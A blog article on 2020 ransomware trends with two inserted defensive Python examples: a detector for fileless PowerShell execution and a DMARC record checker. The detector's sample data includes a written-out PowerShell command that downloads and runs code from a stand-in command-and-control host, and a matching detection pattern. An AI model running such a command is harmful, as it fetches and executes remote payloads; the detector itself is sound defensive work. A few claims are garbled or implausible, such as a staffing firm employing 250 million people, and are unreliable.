Ransomware Trends to Watch Out For in 2020

Ransomware trends are increasing in intensity and sophistication. An infection with ransomware can have a substantial financial effect on a business or organization. Ransomware costs corporations more than $75 billion a year. The expense of downtime leading to loss of income contributes significantly to the economic impact. 

But cybersecurity attacks like ransomware spare no one. Even an individual user can be a victim. Attackers’ favorites are CEOs and corporate leaders for the information they carry, even on their devices. 

No sector is immune either. Highly advanced ransomware attackers target local governments, manufacturing industries, hospitals, schools, banks, and other financial institutions.

Ransomware attackers will victimize whoever is vulnerable. They can exploit whatever weaknesses or vulnerabilities they find in systems, whether it’s a business or not. 

Paying Ransom Does Not Stop Ransomware Attacks

Because ransomware cybercriminals threaten to release files, trade secrets, and even anomalies, some victims give in and pay the ransom. But paying the ransom does not guarantee that attackers will hold up their end of the deal. Some attackers still follow through with leaking data even after ransom payments are made.

Hundreds of thousands of dollars are lost just to pay attackers and prevent leaking sensitive data. If they do not have cyber insurance or workers compensation insurance, such costs could pose a massive problem for businesses and corporations. 

They would then need to take the time to plan for a data breach. But before they could prepare a defense against ransomware attack trends, they need to be aware of the different kinds of ransomware attacks rampant today. 

6 Ransomware Attack Trends to Be Aware Of

  1.  Ransomware Leaks

Over the past few years, data backups have foiled more than a handful of ransomware attacks. Data backups allowed victims to dismiss the ransom demands of attackers and recover their information for free. This preparedness left cyberattackers with little to show for their work.

That changed in November 2019, when Bleeping Computer got an email from the group responsible for creating the Maze ransomware. The attackers told the computer self-help website that they had executed Maze on the network of a security staffing company that employed more than 250 million people.

The attackers copied the data they had discovered on the organization’s network and exfiltrated it to a server under their control. They did this before they instructed Maze to begin encrypting the original files already on the system.

If the victim declined to meet the ransom demand, the attackers told Bleeping Computer, they would begin posting the details online.

Their goal was to compel the business to pay a ransom to keep its data assets from being publicly exposed. In doing so, they developed a two-pronged assault that targeted the confidentiality and accessibility of information about a victim.

Maze ransomware operators also made a ransomware attack on LG and Xerox. They recently published 50.2 GB of stolen data after two failed extortion attempts.

The Maze gang is famous for its eponymous ransomware strain. The team usually operates by breaching corporate networks, stealing sensitive files first, and encrypting data second.

If victims don’t give in during this second extortion attempt, the gang will publish files on its portal. LG and Xerox are at this last stage after apparently refusing to meet the Maze gang’s demands.

  2.  Fileless Attacks

Fileless malware attacks would become more widespread. The security community has noted a spike in fileless attacks recently. This kind of ransomware attack is a strategy to threaten organizations or corporations. 

Fileless attacks typically begin with a spam message that leads victims to a malicious website. Once the victim is on the malicious site, it loads Flash on the victim’s computer, which in turn invokes the Windows PowerShell tool to run instructions in the device’s memory.

The malicious scripts from the attacker’s command-and-control server are then loaded to the device by the ransomware attacker. 

Security researchers have tracked more types of digital threats starting to integrate fileless methods into their attack chains. In November 2019, for example, Malwarebytes reported that exploit kits are gradually migrating to fileless attacks: 3 out of 9 exploit kits active today utilize fileless attacks.

Researchers have also detected threat actors pairing fileless strategies with SOREBRECT, GandCrab, FTCODE, and other ransomware families in recent years. Malware writers will undoubtedly continue to integrate these types of capabilities into their creations in an attempt to avoid detection by signature-based tools.
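Because the chain described above runs from a browser into PowerShell and leaves no file for a signature to match, defenders usually look at process ancestry and command-line traits instead. The following is an added example, not code from the original article; the event field names, the reason labels and every sample event are constructed for illustration.

```python
import re

# Assumption: process-creation events (e.g. from EDR or Windows audit logs)
# already normalised to dicts with these keys. All sample values are constructed.
EVENTS = [
    {"pid": 4120, "parent_image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -WindowStyle Hidden -enc <BASE64-PLACEHOLDER>"},
    {"pid": 5300, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\backup.ps1"},
    {"pid": 6011, "parent_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
    {"pid": 7422, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -Command \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://c2.example.invalid/stage')\""},
]

BROWSER_PARENTS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
# Strings typical of code that is fetched or decoded and then run in memory.
IN_MEMORY = re.compile(r"invoke-expression|\biex\b|downloadstring|frombase64string", re.I)

def flags(cmdline):
    """Return the lower-cased switches (-Name) found on a command line."""
    return [m.lower() for m in re.findall(r"(?:^|\s)-(\w+)", cmdline)]

def is_encoded(flag):
    # PowerShell accepts -ec and any prefix of -EncodedCommand (-e, -en, -enc, ...).
    return flag == "ec" or "encodedcommand".startswith(flag)

def score(event):
    """List the reasons a single process-creation event looks like fileless execution."""
    image = event["image"].lower().rsplit("\\", 1)[-1]
    parent = event["parent_image"].lower().rsplit("\\", 1)[-1]
    if image not in SCRIPT_HOSTS:
        return []
    reasons = []
    if parent in BROWSER_PARENTS:
        reasons.append("browser-spawned-powershell")
    if any(is_encoded(f) for f in flags(event["cmdline"])):
        reasons.append("encoded-command")
    if IN_MEMORY.search(event["cmdline"]):
        reasons.append("in-memory-eval")
    return reasons

def detect(events):
    """Map pid -> reasons for every event that matched at least one trait."""
    return {e["pid"]: r for e in events if (r := score(e))}
```

The scheduled backup script (pid 5300) and the browser-launched Notepad (pid 6011) produce no alert, which is the point of combining ancestry with command-line traits rather than alerting on PowerShell alone.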

  3.  Ransomware Gangs Form Ransom Cartels

Ransomware gangs collaborating for extortion is another ransomware trend. They do it through a shared data leak network, exchanging techniques and information.

In November 2019, Maze Ransomware operators turned ransomware attacks into data breaches after releasing unencrypted data of those who refused to pay. Soon after, they released a “Maze News” platform used to ridicule their unpaid victims by publishing stolen data publicly.

Bleeping Computer announced that KeLa discovered Maze added data from an architectural firm to its “Maze News” data leak website. Bleeping Computer security researchers noticed the stolen information was not connected to Maze’s attack. Instead, data traced back to a LockBit ransomware-as-a-service (RaaS) platform infection.

For clarity about what was going on, those who analyzed the data breach contacted Maze. The attackers replied that they had agreed to partner with LockBit to exchange their platform for data leaks and gain experience with less known ransomware actors. The Maze gang also announced that they had talked to other ransomware families involved in joining their potential “cartel.”

  4.  Coordination With Other Types of Malware

Ransomware gangs and writers of other forms of malware, such as trojans and remote access tools (RATs), found that they could execute more organized and evasive attack campaigns by working together.

During the first half of 2020, this cooperation flowed in both directions. In March, security researchers discovered a website that claimed to be the legitimate download portal for a utility that enhances Windows systems’ performance.

Bleeping Computer noticed that two files were downloaded onto a victim’s machine by the fake program. For Kpot, this threat provided protection. Kpot is a trojan dropped by “file1.exe” that steals passwords.

It stole the victim’s data and then uploaded it to a remote server under the attackers’ control.

  5.  Hackers Target Hospitals with Ransomware Amid the Coronavirus Pandemic

Ransomware attackers also weaponized the recent health crisis, using the term “coronavirus” to prey on and victimize users. They produced ransomware that capitalized on the attempts of users to fight against the pandemic.

CryCryptor was a strain of ransomware discovered in June 2020 by the Slovak security firm ESET. This specific family masqueraded as an official tracing software for COVID-19 to encrypt Android users’ smartphones. 

Ransomware cartels went further by targeting hospitals and health care organizations during the COVID-19 pandemic.

When hospitals were trying to cope with a flood of patients suffering from COVID-19, healthcare professionals and medical facilities in the U.S. and Europe suffered an increase in ransomware attacks attempting to leverage the crisis and attack the healthcare industry at its weakest.

  6.  Persistent Security Threats for the U.S. Election

The 2020 U.S. presidential election’s security is of interest to Infosec experts and election security officials alike. Valimail examined the three largest electoral districts in each U.S. state to analyze their defenses against email IP spoofing, as reported by TechCrunch. 

The digital security solutions provider found that administrators had secured only 10 of the 187 election-related domains with DMARC, a protocol useful for validating a sender’s legitimacy.

Without this type of protection, threat actors can trick the election commission into opening a malicious file attachment or visiting a suspicious website.
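To make the DMARC finding concrete, the following added example (not part of the original article or of Valimail's study) classifies a domain by the TXT records published at `_dmarc.<domain>`. The domain names, the sample records and the four status labels are constructed for illustration; the parsing rules follow RFC 7489.

```python
# Constructed TXT answers for _dmarc.<domain>; a real audit would fetch these over DNS.
SAMPLE_TXT = {
    "county-a.example": ["v=DMARC1; p=reject; rua=mailto:dmarc@county-a.example"],
    "county-b.example": ["v=DMARC1; p=none; rua=mailto:dmarc@county-b.example"],
    "county-c.example": ["v=spf1 include:_spf.example -all"],  # SPF only, no DMARC
    "county-d.example": ["v=DMARC1; p=quarantine; pct=25"],
    "county-e.example": [],                                     # nothing published
}

def parse_dmarc(txt):
    """Parse one TXT string into a tag dict, or None if it is not a DMARC record."""
    parts = [p.strip() for p in txt.split(";") if p.strip()]
    # RFC 7489: the version tag must come first and be exactly DMARC1.
    if not parts or parts[0].replace(" ", "") != "v=DMARC1":
        return None
    tags = {}
    for part in parts[1:]:
        key, sep, value = part.partition("=")
        if sep:
            tags[key.strip().lower()] = value.strip()
    return tags

def classify(txt_records):
    """Return enforced, partial, monitor-only or unprotected for one domain."""
    records = [t for t in map(parse_dmarc, txt_records) if t is not None]
    if len(records) != 1:  # zero or multiple DMARC records: receivers apply no policy
        return "unprotected"
    tags = records[0]
    policy = tags.get("p", "").lower()
    pct_raw = tags.get("pct", "100")
    pct = int(pct_raw) if pct_raw.isdigit() else 100
    if policy in ("reject", "quarantine"):
        # pct below 100 means only a share of failing mail gets the policy.
        return "enforced" if pct == 100 else "partial"
    # p=none only reports; a missing or invalid p gives no enforcement either.
    return "monitor-only" if policy == "none" else "unprotected"

def audit(domains):
    """Map each domain to its DMARC status."""
    return {name: classify(txt) for name, txt in domains.items()}
```

Only the `enforced` result tells receiving mail servers to quarantine or reject all spoofed mail; a `p=none` record exists in DNS but blocks nothing.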

This possibility worries the Cybersecurity and Infrastructure Security Agency (CISA). That explains why, in August 2019, CISA announced its intention to establish a program to help states secure those databases.

“Recent history has shown that ransomware attacks threaten state and county governments and those who help them,” said Christopher Krebs, CISA director, as quoted by Reuters.

Malicious actors could also launch politically themed malware attacks around the election. It occurred with the CIA Election AntiCheat Regulation back in 2016. Cisco Talos researchers observed something similar in November 2019, when the “Donald Trump Screen of Death” surfaced.

Conclusion: Stay Vigilant Against Ransomware Attacks 

Companies need to focus on preventing a crypto-malware attack. Detecting an attack that’s in progress is just not enough. Organizations should gain visibility over their assets. In the absence of oversight, malicious actors could abuse several known security vulnerabilities to access and move laterally across the network.

Companies can use passive asset management tools to identify all connected hardware and software to combat this threat. Artificial Intelligence tools and network monitoring solutions are needed to keep the network safe from ransomware attacks.

From individuals to corporations, there is a need to create a security-aware culture. Be aware of common phishing attacks that typically lead to ransomware. When buying software online, especially when installing an OS, it is good to check whether the Windows key is valid and whether the software you are buying comes from a legit online software store.

Employees need to know the trends and threats to cybersecurity to help in avoiding and mitigating security issues. Security software like Trend Micro ransomware protection is a trusted solution against ransomware and malware attacks.

Trend Micro ransomware protection has a track record of more than 100 million threats blocked since October 2015, both for web ransomware and for Android mobile ransomware threats that have increased up to 15 times higher since 2015.

When we employ different layers of cybersecurity measures and stay vigilant, we will combat ransomware attacks more efficiently. 

AUTHOR BIO

MAYLEEN MEÑEZ

Mayleen Meñez used to work in media before finding her true passion in NGO work, travelling the Philippines and Asia doing so. She homeschools 3 kids and loves reinventing Filipino dishes. She is a resident SEO writer for Softvire Australia and Softvire New Zealand.